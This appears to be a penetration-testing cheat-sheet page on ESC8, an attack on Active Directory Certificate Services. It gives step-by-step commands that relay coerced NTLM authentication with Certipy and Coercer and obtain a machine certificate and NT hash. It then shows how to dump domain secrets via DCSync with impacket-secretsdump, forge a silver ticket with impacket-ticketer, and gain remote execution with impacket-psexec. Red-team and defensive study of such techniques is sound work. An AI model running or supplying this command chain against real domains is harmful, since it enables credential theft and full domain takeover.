Skip to main content

ESC8

Authentication coercion from a machine account where we relay the NTLM hash to AD CS to obtain a certificate that allows us to authenticate.

Requirements

  • A vulnerable web enrollment endpoint.
  • At least one certificate template published that allows for domain computer enrollment and client authentication.

Linux

Certipy relay

bob$ certipy relay -target <adcs_ip> -template <machine_template>

Performing Authentication Coercion (in another terminal)

bob$ coercer coerce -l <your_ip> -t <adcs_ip> -u user1@minions.com -p 'password1' -d minions.com -v

This will give us the certificate and private key of the coerced user.

Request a TGT as the Machine Computer (or the Domain Controller)

bob$ certipy auth -pfx machine_account.pfx

This will give us the user's NT hash, which we can use to authenticate.

Depending on the situation, we now have 2 attacks possible...

DCSync (If we have domain admin permissions)

DCSync using the NT Hash as the Domain Controller
bob$ impacket-secretsdump 'target-dc$'@minions.com -hashes <nt_hash>

Silver Ticket (using a specific Machine Account's NT hash)

Forge a Silver Ticket
bob$ impacket-ticketer -nthash <nt_hash> -domain-sid <domain_sid> -domain minions.com -spn <spn> Administrator
Perform a Pass the Ticket attack with PsExec
bob$ export KRB5CCNAME=Administrator.ccache
bob$ impacket-psexec -k -no-pass target-pc.minions.com